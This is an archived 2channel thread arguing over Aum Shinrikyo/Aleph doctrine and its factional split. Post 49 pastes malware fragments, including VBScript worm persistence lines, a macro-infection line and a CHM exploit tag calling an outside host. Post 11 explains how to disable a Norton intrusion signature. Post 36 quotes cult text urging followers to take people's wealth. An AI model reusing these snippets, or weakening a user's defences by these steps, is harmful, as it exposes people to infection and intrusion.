5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

果たしてオウム・アーレフの教義は完璧か?76

1 :名無しさん@3周年:2006/08/22(火) 21:44:36 ID:mA2i+CPp
こちらでどーぞ(*^^*)

2 :名無しさん@3周年:2006/08/22(火) 21:47:56 ID:mA2i+CPp
▼完璧スレ過去ログ保管庫
http://www.geocities.jp/theravada_buddhism/aum/2ch/

▼オウム真理教(宗教団体アーレフ?)探究はここから!!
主要オウム真理教関係へのリンク集

http://www015.upp.so-net.ne.jp/sinzinrui/

▼オウム関連ニュース
Yahoo!ニュース - オウム真理教問題
http://dailynews.yahoo.co.jp/fc/domestic/aum/
Googleニュース - オウム
http://news.google.co.jp/news?hl=ja&ned=jp&q=%E3%82%AA%E3%82%A6%E3%83%A0

▼Aum Txit Archive─「オウム真理教」とはいったい何であったのか?─
http://pureweb.jp/~ata/


3 :名無しさん@3周年:2006/08/22(火) 21:49:16 ID:mA2i+CPp
▼前スレ
果たしてオウム・アーレフの教義は完璧か?75

http://life7.2ch.net/test/read.cgi/psy/1155717364/


4 :名無しさん@3周年:2006/08/22(火) 21:51:30 ID:mA2i+CPp
▼過去スレ一覧
果たしてオウム・アーレフの教義は完璧か?
74 http://life7.2ch.net/test/read.cgi/psy/1155200614/l50
73 http://life7.2ch.net/test/read.cgi/psy/1154359060/l50
72 http://life7.2ch.net/test/read.cgi/psy/1153667556/l50
71 http://life7.2ch.net/test/read.cgi/psy/1152997070/l50
70 http://life7.2ch.net/test/read.cgi/psy/1151491031/l50
69−2http://life7.2ch.net/test/read.cgi/psy/1150455381/l50
69−1http://life7.2ch.net/test/read.cgi/psy/1150460085/l50
68 http://life7.2ch.net/test/read.cgi/psy/1149831964/l50
67 http://life7.2ch.net/test/read.cgi/psy/1147515962/l50
66 http://life7.2ch.net/test/read.cgi/psy/1147520306/l50
65 http://life7.2ch.net/test/read.cgi/psy/1146458887/l50
64 http://life7.2ch.net/test/read.cgi/psy/1145749319/l50
63 http://life7.2ch.net/test/read.cgi/psy/1144933300/l50
62 http://life7.2ch.net/test/read.cgi/psy/1143283458/l50
61 http://life7.2ch.net/test/read.cgi/psy/1142411572/l50



5 :名無しさん@3周年:2006/08/22(火) 21:53:09 ID:mA2i+CPp
▼過去スレ一覧
60−2 http://life7.2ch.net/test/read.cgi/psy/1141555920/
60−1 http://life7.2ch.net/test/read.cgi/psy/1141567712/l50
59 http://life7.2ch.net/test/read.cgi/psy/1140876976/l50
58 http://life7.2ch.net/test/read.cgi/psy/1139778994/l50
57 http://life7.2ch.net/test/read.cgi/psy/1139134269/l50
56 http://life7.2ch.net/test/read.cgi/psy/1138367355/l50
55 http://life7.2ch.net/test/read.cgi/psy/1137412656/l50
54 http://life7.2ch.net/test/read.cgi/psy/1136783998/l50
53 http://life7.2ch.net/test/read.cgi/psy/1136284213/l50
52 http://life7.2ch.net/test/read.cgi/psy/1135344982/l50
51 http://life7.2ch.net/test/read.cgi/psy/1134692088/l50
50 http://life7.2ch.net/test/read.cgi/psy/1133789300/l50
49 http://life7.2ch.net/test/read.cgi/psy/1133113835/l50

47 http://life7.2ch.net/test/read.cgi/psy/1131864300/l50
46 http://life7.2ch.net/test/read.cgi/psy/1130893247/l50


6 :名無しさん@3周年:2006/08/22(火) 21:54:56 ID:mA2i+CPp
おっと失礼m(__)m

48 http://life7.2ch.net/test/read.cgi/psy/1132500945/l50

▼過去スレ一覧
45 http://life7.2ch.net/test/read.cgi/psy/1129987264/l50
44 http://life7.2ch.net/test/read.cgi/psy/1129028068/l50
43 http://life7.2ch.net/test/read.cgi/psy/1127486459/l50
42 http://life7.2ch.net/test/read.cgi/psy/1125788508/l50
41 http://life7.2ch.net/test/read.cgi/psy/1123981596/l50
40 http://life7.2ch.net/test/read.cgi/psy/1121165852/l50
39 http://life7.2ch.net/test/read.cgi/psy/1118418943/l50
38 http://life7.2ch.net/test/read.cgi/psy/1115658072/l50
37 http://life7.2ch.net/test/read.cgi/psy/1114349066/l50
36 http://life7.2ch.net/test/read.cgi/psy/1113245836/l50
35 http://life7.2ch.net/test/read.cgi/psy/1111674215/l50
34 http://life7.2ch.net/test/read.cgi/psy/1109225579/l50
33 http://life7.2ch.net/test/read.cgi/psy/1105874920/l50
32 http://life7.2ch.net/test/read.cgi/psy/1103638202/l50



7 :名無しさん@3周年:2006/08/22(火) 21:56:09 ID:mA2i+CPp
▼過去スレ一覧

31 http://life7.2ch.net/test/read.cgi/psy/1101814121/l50
30 http://life6.2ch.net/test/read.cgi/psy/1099567285/l50
29 http://life6.2ch.net/test/read.cgi/psy/1096722718/l50
28 http://life6.2ch.net/test/read.cgi/psy/1094344237/l50
27 http://life6.2ch.net/test/read.cgi/psy/1091533953/l50
25−2 http://life6.2ch.net/test/read.cgi/psy/1089745407/l50
25−1 http://life6.2ch.net/test/read.cgi/psy/1088337729/l50
24 http://life6.2ch.net/test/read.cgi/psy/1084182557/l50
23 http://etc.2ch.net/test/read.cgi/psy/1081168591/l50
22 http://etc.2ch.net/test/read.cgi/psy/1079937025/l50
21 http://etc.2ch.net/test/read.cgi/psy/1078924094/l50
20 http://etc.2ch.net/test/read.cgi/psy/1078289939/l50
19 http://etc.2ch.net/test/read.cgi/psy/1077866713/l50
18 http://etc.2ch.net/test/read.cgi/psy/1077625362/l50
17 http://etc.2ch.net/test/read.cgi/psy/1076600547/l50


8 :名無しさん@3周年:2006/08/22(火) 21:57:17 ID:mA2i+CPp
▼過去スレ一覧
16 http://etc.2ch.net/test/read.cgi/psy/1075240714/l50
15 http://etc.2ch.net/test/read.cgi/psy/1073213953/l50
14 http://etc.2ch.net/test/read.cgi/psy/1071756287/l50
13 http://etc.2ch.net/test/read.cgi/psy/1068336159/l50
12 http://etc.2ch.net/test/read.cgi/psy/1065615770/l50
11 http://etc.2ch.net/test/read.cgi/psy/1063541752/l50
10 http://etc.2ch.net/test/read.cgi/psy/1061296400/l50
09 http://etc.2ch.net/test/read.cgi/psy/1059141640/l50
08 http://etc.2ch.net/test/read.cgi/psy/1056632966/l50



9 :名無しさん@3周年:2006/08/22(火) 21:57:57 ID:mA2i+CPp
▼過去スレ一覧
07 http://etc.2ch.net/test/read.cgi/psy/1053615404/l50
06 http://etc.2ch.net/test/read.cgi/psy/1050853885/l50
05 http://life.2ch.net/test/read.cgi/psy/1042359323/l50
04 http://life.2ch.net/test/read.cgi/psy/1039186321/l50
03 http://life.2ch.net/test/read.cgi/psy/1037170497/l50
02 http://life.2ch.net/test/read.cgi/psy/1035025652/l50
01 http://life.2ch.net/test/read.cgi/psy/1027241172/l50


10 :名無しさん@3周年:2006/08/22(火) 22:01:28 ID:B+OwxPtR
>>1
乙です。

11 :転載:2006/08/22(火) 22:32:53 ID:mA2i+CPp
> Norton Internet Securityの「進入検知」をダブルクリックして、
> 下の「拡張(A)」をクリックします。
> その中から「HTTP MSIE JavaScript OnLord RteCodeExec」を見つけ出し、
> この左マークシートの「チェック」を外します。
>
> それで、「過剰反応」が収まり、アクセスが回復するはずです。

和井さん、ありがとうございました。
おかげで書き込みできるようになりました。
ただし、私のノートンの手順と少々違ってたので、
私の手順もここに書いておきます。

Norton Internet Securityの「侵入検知」をダブルクリック。
次に「詳細(A)」をクリック。
そうすると。「侵入検知」の画面が出てきます。
その画面の左側にある、「侵入検知で監視したくないシグネチャを除外します」の項目から「HTTP MSIE JavaScript OnLord RteCodeExec」を見つけ出し
、クリックして反転させます。
そうしたら、まん中の「除外」を押します。
そうすると、右側の「除外したシグネチャ」のところに、「HTTP MSIE JavaScript OnLord RteCodeExec」が移動します。
最後に下のOKを押すと前画面に戻りますので、そこで、OKを押せば設定終了となります。これで、書き込みができるはずです。

12 :名無しさん@3周年:2006/08/23(水) 01:47:25 ID:ZMtNeJih
>>1
乙です。
                    ,===,====、
                   _.||___|_____||_
..                 /   /||___|^ l      
..               (・ω・`)//||   |口| |ω・` )
.             ./(^(^ .//||...||   |口| |c  )
...               /   //  ||...||   |口| ||し      新スレです
.......        (・ω・`) //....  ||...||   |口| ||        楽しく使ってね
         /(^(^ //  ....  .||...||   |口| ||        仲良く使ってね
 ""    :::'' |/   |/ '' "  :::  ⌒  :: ⌒⌒⌒ :: ""  `
 :: ,, ::::: ,, ; ̄ ̄ ̄  "、 :::: " ,, , :::   " :: " ::::  "




13 :阿佐谷北(本物) ◆Kcjlum1seI :2006/08/23(水) 06:48:34 ID:8kTAntgx
前スレ>>968
>阿佐谷北(本物) ◆Kcjlum1seI さんも、
>みんなから、いろいろ言われたら出てこなくなっちゃったなあ。

 仕事が非常に忙しくて、なかなかここに来る暇が無いんです。
 だから「みんなから色々言われた」という内容もほとんど読んでいません。

>教団辞めた理由も聞いてみたかったんだけど。

 辞めたんじゃなくて、追い出されているだけなんですけど。
 それは私にも落ち度が有ると思って今まで黙って来ましたが、今回の分派騒動を見るに
結局今の教団は「少しでも毛色の変わっている者に対して、嫌悪し排斥する事で自分達の正当性を主張する」という傾向が強く
そしてそれが私が追い出された約10年前から全く変わっていない事を改めて確認した次第です。

14 :名無しさん@3周年:2006/08/23(水) 07:33:56 ID:0qQBAoeH
>>13

それはA派のことですよね。M派は広く門戸を広げ、他者否定はいけない
と教えてる

15 :税理士東野:2006/08/23(水) 07:55:37 ID:82w6DEA2
信教の自由。
ウンチクたれるな

16 :白龍:2006/08/23(水) 09:38:13 ID:ZMtNeJih
>>13
わざわざ返信いただいて申し訳ありません。
やはり、意見の対立から追い出させたのですか。
自分達こそが、正当であるという傾向は、
結構前から出ていたのですね。
今はもう、純粋に教祖帰依を打ち出す者以外は、
排除する傾向が、より強くなっているようです。
正悟師でも例外ではないようなので、
少々末期的かと感じています。


17 :名無しさん@3周年:2006/08/23(水) 09:44:24 ID:tEPKn2k6
その方が修行に身が入ると思うよ。
グルを最後まで無実だと信じきれるピュアできれいな心を
持った人たちはそうざらにはいないでしょう。
皆、形ばかりの虚像を見てそうにちがいないって決め付けるんだから。
M派の宣伝はいりませんよw

18 :白龍:2006/08/23(水) 10:08:29 ID:ZMtNeJih
>>17
私は、M派にも多少懐疑的なので、
おおげさに、M派の宣伝をするつもりはありません。
ただ、A派より自由があるかなとは思っています。

修行が進むとおっしゃるが、なんのための修行なのですか?
多くの衆生済度のための修行ではないのですか?
互いに嫌悪し排除する状況や、プライドを強めるような状況では、
最も大切な、四無量心の実践から、
どんどん離れていくだけのような気がするだけです。

19 :名無しさん@3周年:2006/08/23(水) 10:24:50 ID:tEPKn2k6
グルを信じきる事こそ四無量心の実践に他ならないでしょう?
大乗の前には無論小乗があるわけで。
まず自分を徹底的に高めなくては救済は不可能。
慈愛に至るまではまず自分に興味を持たなくては。
あなたの考えてることはもっと自分を高みに上げられた者が
初めて実践できること。
あなたからは救済したいという気持ちの波動を強く感じる。
でもそれはまだ早いんです。瞑想してみてください。



20 :名無しさん@3周年:2006/08/23(水) 10:37:07 ID:2xgt9MlB
ならM派こそグルへの強烈な帰依を寛容すべきでは?
一蓮托生でA派ごと教団が無くなるのが嫌だからM派ができた訳で、衆生救済が本質ではない。
自己保存の言い訳が救済になっているだけ。
M派には宗教的な基盤なんて何もない。グルの威光を目立たないように使っているに過ぎない。

21 :名無しさん@3周年:2006/08/23(水) 10:46:40 ID:tEPKn2k6
グルの無いM派は即席でこしらえた飛行機のようなもの。
いずれはきりもみしながら墜落してゆく。

22 :和井 恵:2006/08/23(水) 10:51:46 ID:eAl0WL70
>>19
>大乗の前には無論小乗があるわけで。

この、「大乗」とか「小乗」というモノは「虚構」です。

歴史的には、当時の仏教教団に「分裂騒動」が起き、
追い出されたグループの人たち(大衆部)が、
自分たちの「優位性」を演出するために、
自分たちのグループを「大乗」と自称し、
一方の人たち(上座部)を「小乗」という
レッテルを貼り付けで「侮蔑」したのです。

そして、「大乗教典」という「創作教典群」を次々と創り始め、
それらを人々に広めて行きました。
それらの教典群の中には、勿論、この「小乗」なる差別用語も
頻繁に登場し、「既成の事実化」させていったのです。

23 :名無しさん@3周年:2006/08/23(水) 11:18:51 ID:tEPKn2k6
あなた宗教学者の方か?
どこの誰がそう翻訳しました?

24 :白龍:2006/08/23(水) 11:27:38 ID:ZMtNeJih
>>18
>グルを信じきる事こそ四無量心の実践に他ならないでしょう?

信じていれば、実践になるということではないと思います。
それは、あくまで信を持っているというだけで、実践ではないでしょう?
実践とは、行動に移すことだと私は考えるのですが、違うのでしょうか?
人を、嫌悪したり、追い出したりすることが、
四無量心の実践と、どうして言えるのか、その理論的背景を説明していただきたいです。

それと疑問なのが、そこまでグルに忠実な方達が、
何ゆえ、ステージを否定した発言を繰り返すのかということです。
グルが絶対なら、グルの決めた正大師のステージに、
(グルと使っているので、あえてグルと使いますが)
従うのが当然だと思うのですが、逆に否定している。
これは矛盾だと思うのですが、違いますか?

自己の内面を見つめるため、
一時的に、煩悩的空間から離れることは、当然だと思いますので、
ある期間小乗の修行は、大事だと思いますが、
あくまで、排除していくのは、自己の煩悩であって人ではないでしょう。
戒律を守り、清浄に過ごすというなら、わかりますが、
お互いが、怒りと嫌悪で心を波立たせている空間が、
果たして、すばらしい修行空間なのでしょうか?
だいたい、教祖も小乗では救済できないから、
大乗の道を、同時並行で進ませる修行形態をとっていたはずです。
結局、いつまでも小乗にしがみついていても、
誰も救済されないばかりか、他を苦しめる結果になっていませんか?

25 :チンカス篠沢:2006/08/23(水) 11:31:43 ID:BR8vCaI7
前スレ868
キャンディ、人聞きの悪いこといわんでくれ。
今週は夜勤なんだ。でも昼間なかなか眠れん。

ところで今日はどっちが主婦でどっちが中学生?

26 :白龍:2006/08/23(水) 11:38:45 ID:ZMtNeJih
>>20
これは、M派への正当な批判ですね。
M派のサマナの方からの反論を期待したいです。

M派の中にも、当然いまだ、教祖に帰依している人がいます。
仙台の信徒なんか、ある日突然M派になったのですから、当然です。
でも、その方たちを、追い出すようなことはしていません。
全国のことは分かりませんが、仙台ではそのようなことはなされていません。
ただし、自分からA派の支部に行かれる方はいるようです。
そこは、個人個人の考え方の違いなので、いたし方ないかと思われます。

27 :名無しさん@3周年:2006/08/23(水) 11:50:53 ID:tEPKn2k6
>>24
それはM正大師がグルを非難するからでしょう?
ステージが意味を成さなくて当然です。いいですか、正大師が
そのステージを作った人物を批判しているんですから
もう言いたいことはお分かりでしょう?

28 :和井 恵:2006/08/23(水) 12:12:15 ID:eAl0WL70
>あなた宗教学者の方か?

「インド仏教史」を知っている人なら、常識の範囲内ですよ。

>どこの誰がそう翻訳しました?

何かの「経典」と間違えているのでは?

29 :白龍:2006/08/23(水) 12:14:55 ID:ZMtNeJih
>>27
あなたのステージが、どのようなものなのか分かりませんが、
少なくても、正大師よりは下ですよね?
正大師のステージにあるものが、
深い考えによって、なした行動とはお考えにならないのですか?
よく教団では言いますよね。
ステージの下のものが、ステージの高い成就者の心境を理解できないと。

30 :和井 恵:2006/08/23(水) 12:21:29 ID:eAl0WL70
参考資料の一例。

→ http://homepage3.nifty.com/54321/indo.html

31 :名無しさん@3周年:2006/08/23(水) 12:26:07 ID:tEPKn2k6
>>29
ですがね、グルを非難することだけはいかなるステージの者でも
それがどういうことか分かるでしょう?
どんな深い理由があろうが「グル非難」は特別なものですよ。

>>28
何はともあれ自分を高みに導けない者が他者を導くなど
できません。言い方を変えれば自分を救済できない者に
他者の救済はできないと。
そういうことですよ。

32 :名無しさん@3周年:2006/08/23(水) 12:30:11 ID:tEPKn2k6
>>30
では「ウパニシャド」についてもお詳しいのかな?

33 :和井 恵:2006/08/23(水) 12:33:57 ID:eAl0WL70
>>31
>何はともあれ自分を高みに導けない者が
>他者を導くなどできません。

その通り。

>言い方を変えれば自分を救済できない者に
>他者の救済はできないと。

これも異議なし。
「自分の頭のハエ」さえ追い払えないモノが、
「他者救済」など出来るわけがない。

>そういうことですよ。

確かに、そういうことだよね。


34 :和井 恵:2006/08/23(水) 12:35:25 ID:eAl0WL70
>では「ウパニシャド」についてもお詳しいのかな?

それは、あまり詳しくはないですね。
ご教授願えますか?

35 :名無しさん@3周年:2006/08/23(水) 12:39:53 ID:tFXXKlsF
少女漫画じゃあるまいし、何がピュアだよ人殺しておいて
以下信徒庁決意文抜粋 これは教祖の肉声で録音されたテープで、サマナが記憶シュジュウさせられて
いたものです これを叩き込まれたサマナは平気で、適当な事を言って
私に借金を押し付け、抗議をすると、顔をひきつらせて言い訳して逃げました
教祖がすべての原因です
あんたらサマナは、適当なこと言って人から金まきあげてメシ食えるから
自分の財布は痛まない だから教祖が好きなんだろ?
人から巻き上げてだって、自分にメシ食わしてくれるもんな!!!
教祖なんかヤクザの親分だわ



36 :名無しさん@3周年:2006/08/23(水) 12:41:49 ID:tFXXKlsF
もともと財そのものは三グナの変形した形である。
したがって、これは誰の所有でもない。
この誰の所有でもないものを真理のために使うとするならば、
それは最高の功徳となる。
逆にこの誰の所有でもない財が、煩悩を増大させるために使われているとするならば、それは断じて救済の障碍である。
断じて救済の障碍である。
なぜならば、その財はその魂の煩悩を増大させるからである。
なぜならば、その財が布施されることによって進むはずの救済計画が、その分だけ進まないからである。
なぜならば、その魂がその財を布施することによって積むはずの功徳を、積むことができないからである。
したがって、はぎ取るぞ。はぎ取るぞ。
身ぐるみはぎ取って、偉大なる功徳を積ませるぞ。
丸裸にして、その魂の大いなる飛躍を手助けするんだ。
身ぐるみはぎ取ることに対して躊躇するということは、その魂の本当の幸せを願っていないということだ。その魂を輪廻転生を考えた場合、現在の幸・不幸は全く関係ない。
つまり、その魂が泣こうがわめこうが、最高の転生をさせるためには、すべてを奪い尽くすしかないんだ。
それでもはぎ取ることを躊躇するのは、四無量心が足りない証拠だ。
聖哀れみが足りない証拠だ。
したがって、はぎ取って、はぎ取って、すべてを奪い尽くすぞ。
はぎ取って、はぎ取って、すべてを奪い尽くすぞ。
そして、業質のある魂には、より激しいラトナサンヴァバの実践をさせるんだ。
より激しいラトナサンヴァバの実践をさせるんだ。
財そのものは誰の所有でもない。
財が誰かに帰属するなどというのは、明らかに幻影なんだ。
幻影である証拠として、死後、わたしたちは財を持っていくことはできない。
生前の財を所有することはできないんだ。
したがって、財は積極的に奪い取るべきである。
財は積極的に盗み取るべきである。


37 :名無しさん@3周年:2006/08/23(水) 12:44:29 ID:tFXXKlsF
19
あんた何にも知らないのね?
あんたらの神聖出家空間が、元サマナが下向して経営していた
テレクラの収益で運営されていた時期があるのよ?

これ書くと、また、テレクラなんてたいしたことないって、変な擁護する奴が
いるみたいだけど、、
テレクラって、女が男に色を売るところなのよ?
あんたの教祖は、金が入れば何でもしたの!宗教者にあるまじき行為よ
ナニがピュアなのよ、バカじゃないの?

38 :和井 恵:2006/08/23(水) 12:45:25 ID:eAl0WL70
>どんな深い理由があろうが「グル非難」は特別なものですよ。

理由の内容と、その正当性に依るでしょうが、
そんなことをいつまでも言っているから、
「盲信」だとか、「狂信者」だとか、周囲から思われるのでは?

39 :白龍:2006/08/23(水) 12:49:06 ID:ZMtNeJih
>>31
ある者をグルと信奉し、死ぬまで貫き通す。
そのことに対して心の中まで、
誰も束縛されることはないし、
法的にも信教の自由は認められています。

この点は、あなたも譲れないでしょうし、
そのことを、言い合っても、
堂々巡りの議論にしかならないでしょうから、これ以上は言いません。

しかし、教団の現状、特にA派に顕著に見られるような、
他を批判し、嫌悪し、排除していくような姿が、
真理の実践者としての、
グルが望んだ教団の姿なのですか?
あなたはどうお考えになりますか?

40 :名無しさん@3周年:2006/08/23(水) 12:49:54 ID:tFXXKlsF
知っていて、言っているの?ピュアだのなんだの、、
ヴァジラヤナだから、こんなやり方も、許せるって思っているの?
私は、自分よりアンタラのほうが、よほど穢れてみえているんですけどなにか?
それなのに、天人だの、聖者だのほざいてさあ、プ!

商売女の上前はねて、生き延びているのよ、まあ、今はやってないけど、、
教祖は知っていて、受け取っていたらしいよ
で、神聖行だってよ

41 :和井 恵:2006/08/23(水) 12:54:06 ID:eAl0WL70
>では「ウパニシャド」についてもお詳しいのかな?

結局、何が言いたかったのかな?

42 :名無しさん@3周年:2006/08/23(水) 12:55:33 ID:tFXXKlsF
元オウムのテレホンクラブ経営者逮捕
2000.08.06 The SankeiShimbun
 オウム真理教(アレフと改称)元信者の経営するテレホンクラブが、
客から法外な延滞料金を脅し取った事件で、警視庁刑事総務課と本田署は六日まで
に、恐喝の疑いで、経営者の川本禎三(39)=東京都新宿区西新宿六ノ二三ノ一
=と、宝石販売会社社長檜垣誠治(42)=品川区大井五ノ二ノ三=の二容疑者を
新たに逮捕した。事件での逮捕者は計九人となった。

 調べによると両容疑者は新宿区内でテレクラを経営、客が登録申し込みの際、
一日千円の延滞金支払いを約束したことを悪用して一九九八年一月から六月にかけ

、従業員に命じて葛飾区の会社員=当時(33)=と家族に「すぐに払え。
会社に押し掛ける」などと電話をし、計約百二十八万円を脅し取った疑い。

 同店をめぐっては、これまでに七人から同様の手口で計約五百二十万円を脅し取
ったとして従業員ら七人が逮捕されている。また七十九人から被害届が出され、
被害額は計約四千七百万円に上るという。

 公安当局によると川本容疑者は元オウム信者で、かつて教団に数億円のお布施を
するなどしていた。
http://www2.cc22.ne.jp/~hiro_ko/2-16ohmu.html

43 :名無しさん@3周年:2006/08/23(水) 12:56:40 ID:Ep1X7Q90
>>36

あ、呆れた・・・
こんなことを記憶修習させてたのか・・・

44 :名無しさん@3周年:2006/08/23(水) 12:58:17 ID:Ep1X7Q90
っていうか、
大乗小乗の話にウパニシャッドは関係ないのでは?

45 :名無しさん@3周年:2006/08/23(水) 12:58:59 ID:tFXXKlsF
ただまあ、一日千円の延滞料を払うと、事前に契約があるなら
延滞すれば取られても仕方ないような気もするけどね、、
なんであれ、
元信者がテレクラだかん(こいつはホーリーネームももらっていたはず)
そういう金で、運営されていた

46 :和井 恵:2006/08/23(水) 12:59:50 ID:eAl0WL70
>大乗小乗の話にウパニシャッドは関係ないのでは?

じゃあ、苦し紛れの「論点ずらし」?

47 :名無しさん@3周年:2006/08/23(水) 13:01:51 ID:Ep1X7Q90
じゃない?

だって大乗小乗は仏教の話であって、ウパニシャッドは別のことのお話し。

48 :名無しさん@3周年:2006/08/23(水) 13:02:00 ID:F3xM4Z7k

                   /   ノノ ノノノ ヾヽ、ヽ
               /   ノj `      ´ i | キョ、教祖様ーー
               i    {   ` , ,-,、´  i | ア、アア、アアアアーーーイクーー
              {    i     )-―-'(  i |    
                 ヽ   i     ⌒   } |_,,,. -‐- 、  
              __)), ,ノ人   、_,  ノ''"´   ,      \ 
                /       ` ー--,. '´   . : :`(      ゝ、
               /           : : :: :´: .         : :\ , ' ´_   ヽ
           /  r´: :       : : : :       ,. ' ´ ヽ>'´    ,'ヽ!
             / γ: :        ノ    _   ,, 、,, ,,__i  。 ./       ; ,!
           i   ir' " ヽ    ,,, ''' ´         `"7         :/ 
         i  |、 ° }, '                 ` y'         /
   "'''‐‐- ...,,,_|   ヽ、ー/           __    _/          /
             `'''-,,,て          ´    ̄ ̄ /          ,イ 
             `''-、__/            /    `  / ,!    _,
                     `''-,,_     ,..、_,,..イ´      i'´  `ゝ''"´
                    \_ ,,,,,...ゞ、_           |ー-/  
                           ミ〉       !r'´
                         ヽ   ミ/、 /|  i  i } 


49 :名無しさん@3周年:2006/08/23(水) 13:02:49 ID:F3xM4Z7k
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)

50 :和井 恵:2006/08/23(水) 13:02:54 ID:eAl0WL70
>ただまあ、一日千円の延滞料を払うと、事前に契約があるなら
>延滞すれば取られても仕方ないような気もするけどね、、

延滞料の%(掛け率)って規制されていなかった?
「違法契約 」じゃないのかな…


51 :白龍:2006/08/23(水) 13:06:33 ID:ZMtNeJih
>>49
ウイルス検出。

52 :チンカス篠沢:2006/08/23(水) 13:07:42 ID:BR8vCaI7
あああ、また「祭り」が始まってしまう・・・
ワークの人達昨日あれだけ否定的なこと書いちゃったんだから
今日はその分法施させてあげなきゃだめだよ・・・



53 :名無しさん@3周年:2006/08/23(水) 13:08:00 ID:tFXXKlsF
教祖って、他人には宗教的な立派なこと言っておいて
自分の命を長引かせるためには、すべての戒律をやぶってみせたじゃないの?

あんた、なんで金が欲しいって、事件の隠蔽のため、なのよ
そのために、莫大な金のかかる軍備や(ハルマゲドンもからむけど)細菌培養の
ための一台数千万もする機器をポンポン買い付けて
金がかかるから、信者からむしれ、ってけしかけていたんじゃないの!

もともと、事件は教団の内部から起こっているのよ?サリン事件で教祖が
無実かどうか、だけが焦点じゃないの!教祖が、真島が死んだのを隠すことに
決めたから、すべての場面でウソをつきとおし、ばれそうになると逆切れして
人殺していたんじゃないの
自首すればよかったのに、

54 :名無しさん@3周年:2006/08/23(水) 13:13:14 ID:F3xM4Z7k

                   /   ノノ ノノノ ヾヽ、ヽ
               /   ノj `      ´ i | キョ、教祖様ーー
               i    {   ` , ,-,、´  i | ア、アア、アアアアーーーイクーー
              {    i     )-―-'(  i |    
                 ヽ   i     ⌒   } |_,,,. -‐- 、  
              __)), ,ノ人   、_,  ノ''"´   ,      \ 
                /       ` ー--,. '´   . : :`(      ゝ、
               /           : : :: :´: .         : :\ , ' ´_   ヽ
           /  r´: :       : : : :       ,. ' ´ ヽ>'´    ,'ヽ!
             / γ: :        ノ    _   ,, 、,, ,,__i  。 ./       ; ,!
           i   ir' " ヽ    ,,, ''' ´         `"7         :/ 
         i  |、 ° }, '                 ` y'         /
   "'''‐‐- ...,,,_|   ヽ、ー/           __    _/          /
             `'''-,,,て          ´    ̄ ̄ /          ,イ 
             `''-、__/            /    `  / ,!    _,
                     `''-,,_     ,..、_,,..イ´      i'´  `ゝ''"´
                    \_ ,,,,,...ゞ、_           |ー-/  
                           ミ〉       !r'´
                         ヽ   ミ/、 /|  i  i } 


55 :名無しさん@3周年:2006/08/23(水) 13:15:09 ID:tFXXKlsF
絶対帰依、って言っている連中は、すべて知っていて、ほざいているのかしら
何も知らなくて、ほざいているのかしら?
何にも知らないのに、よく思い知らせてやるってのは、一種の快感よね
ああ、おかしい、、

暴露本には、(教祖にのっとられた何とか工業、って会社の社長、が書いた本ね)
こう書いてあった(その著者が脚色したかどうかは、ちょとわからないんだが)
テレクラ経営するその信者が、まだサマナだったとき、
自分は下向して、女が好きだから風俗やりたいと、教祖にいったんだそう
そのとき教祖は、風俗自体は悪いが、布施にすれば、浄化してやれるとかいって
別に反対もしなかったらしい そのかわり、布施せよと。
まあ、小説の形態をとっていたんで、もしかすると著者が脚色した可能性はあるが
事実、そのテレクラ経営者は逮捕され、新聞の一面にもデカデカ載った


56 :名無しさん@3周年:2006/08/23(水) 13:17:17 ID:KfYeQOWX
>>20

M派では正大師をグルとして、オウム三唱の後正大師に向って

おんまいたれいやそわか と13回唱えてるよ

57 :名無しさん@3周年:2006/08/23(水) 13:20:45 ID:tFXXKlsF
サマナは新聞みないから、知らないで通過するものと思う
無知の上の絶対帰依ね
まあ、教祖の汚いのがわかんないで帰依するという、、
それでもいい、って女は、(男はまだわかるんだけど、、)すげえタマだと
漏れは思うね

信者には邪淫してはいけません、って教えながら
自分らは、男と女が淫らな会話を楽しむ、そういう娯楽を提供する仕事で
得た金銭で、パクパクオマンマ食って、聖者だの気取っているんだもの、、
まあ、知らぬが仏という奴で(笑

58 :名無しさん@3周年:2006/08/23(水) 13:22:57 ID:tEPKn2k6
>>39
>>
しかし、教団の現状、特にA派に顕著に見られるような、
他を批判し、嫌悪し、排除していくような姿が、

内容が抽象的すぎて少しわかりません。

>>46
輪廻転生について分かりやすく概念を捉えることができますよ。
アートマンとブラフマンについても少し勉強してみてくださいな。

59 :名無しさん@3周年:2006/08/23(水) 13:25:15 ID:Ep1X7Q90
>>57

>無知の上の絶対帰依ね

同意。

中途半端に知ってるからダマされるんだね。



60 :名無しさん@3周年:2006/08/23(水) 13:26:46 ID:Ep1X7Q90
>>58

そのことは大乗という「虚構」とどう関係があるの?

61 :名無しさん@3周年:2006/08/23(水) 13:31:23 ID:tEPKn2k6
帰依による修行というのが現代文化に溶け込んで
いないんでしょうね。
物質文明はまもなく終わりを迎える気がしますよ。
いざ、精神の時代が来た時、正しい指導者がいなくては終わりですよ。



62 :和井 恵:2006/08/23(水) 13:34:23 ID:eAl0WL70
>輪廻転生について分かりやすく概念を捉えることができますよ。
>アートマンとブラフマンについても少し勉強してみてくださいな。

釈迦は、そのような知識は「解脱・悟りの役に立たない」として、
「無記(ノーコメント・相手にしない)」を貫いています。
私も「トリビア」を増やすつもりはありません。
悪しからず…

63 :名無しさん@3周年:2006/08/23(水) 13:35:47 ID:Ep1X7Q90
>>58

>アートマンとブラフマンについても少し勉強してみてくださいな。

そのことは大乗という「虚構」とどう関係があるの?


64 :名無しさん@3周年:2006/08/23(水) 13:39:53 ID:tEPKn2k6
>>62
「解脱・悟りの役に立たない」かどうかあなたに判断できるのですか?
あなたもしかしてお坊さん?
>>63
